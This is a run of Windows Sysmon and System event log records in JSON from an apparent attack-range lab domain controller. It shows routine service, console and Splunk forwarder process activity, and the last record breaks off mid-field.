{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7026,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76825,"ProcessID":856,"ThreadID":860,"Channel":"System","Message":"The following boot-start or system-start driver(s) did not load: \r\ncdrom\r\ndam","param1":"\r\ncdrom\r\ndam","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1672,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.767\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 920\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.767","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"920","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1673,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.767\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.767","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","TargetProcessId":"3884","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1674,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.783\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.783","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1675,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.788\r\nProcessGuid: {41C8662E-1F74-5F25-0000-00103F670300}\r\nProcessId: 3916\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.788","ProcessGuid":"{41C8662E-1F74-5F25-0000-00103F670300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1676,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-00103F670300}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-00103F670300}","TargetProcessId":"3916","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1677,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-00103F670300}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-00103F670300}","TargetProcessId":"3916","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1678,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1679,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1680,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1681,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 